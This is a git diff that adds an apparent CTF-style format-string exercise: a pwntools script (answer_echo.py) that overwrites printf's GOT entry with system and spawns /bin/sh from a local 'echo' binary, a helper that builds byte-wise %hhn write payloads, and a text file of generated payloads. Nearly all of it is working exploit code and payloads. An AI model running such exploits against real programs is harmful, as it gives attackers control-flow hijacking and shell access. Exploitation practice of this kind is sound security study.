diff --git a/format-string/echo/answer_echo.py b/format-string/echo/answer_echo.py new file mode 100755 index 0000000..68bdd59 --- /dev/null +++ b/format-string/echo/answer_echo.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64, math +context(arch = "i386",os = "linux", log_level = "debug") + +p = process('./echo') +elf = ELF('./echo') + +printf_got = elf.got['printf'] +system_plt = elf.plt['system'] + +payload = fmtstr_payload(7, {printf_got: system_plt}) + +p.sendline(payload) +p.sendline("/bin/sh") +p.interactive() + diff --git a/format-string/echo/echo b/format-string/echo/echo new file mode 100755 index 0000000..71e0963 Binary files /dev/null and b/format-string/echo/echo differ diff --git a/format-string/echo/test_echo.py b/format-string/echo/test_echo.py new file mode 100755 index 0000000..e070d1c --- /dev/null +++ b/format-string/echo/test_echo.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python2 +from pwn import * +from LibcSearcher import * +from struct import pack +import os, base64, math +context(arch = "i386",os = "linux", log_level = "debug") + +def gen_write_byte_format_string_i386(byte_value, write_address, fmtstr_shift_position, padding='0'): + # Placing: Align4(Padding Characters(Output_Count = byte_value), Fmtstr), Write Address + first_padding = padding * byte_value + flag = True + align_part_align_length = int(math.ceil(float(byte_value) / 4) + 2) + fmt_str = "%%%d$hhn" % (fmtstr_shift_position + align_part_align_length) + result_1 = first_padding + fmt_str + result_1 += (align_part_align_length * 4 - len(result_1)) * padding + result = result_1 + p32(write_address) + return result + +with open("answer_echo.txt", "w") as f: + f.write(gen_write_byte_format_string_i386(1, 0xffffce0c, 7)) + f.write("\n") + f.write(gen_write_byte_format_string_i386(2, 0xffffce0d, 7)) + f.write("\n") + f.write(gen_write_byte_format_string_i386(3, 0xffffce0e, 7)) + f.write("\n") + f.write(gen_write_byte_format_string_i386(4, 0xffffce0f, 7)) + f.write("\n") + f.write("exit") + f.write("\n") + + +#p = process('./echo') +#elf = ELF('./echo') + + diff --git a/format-string/echo/test_echo.txt b/format-string/echo/test_echo.txt new file mode 100644 index 0000000..bd359b0 --- /dev/null +++ b/format-string/echo/test_echo.txt @@ -0,0 +1,5 @@ +0%10$hhn0000 Îÿÿ +00%10$hhn000 Îÿÿ +000%10$hhn00Îÿÿ +0000%10$hhn0Îÿÿ +exit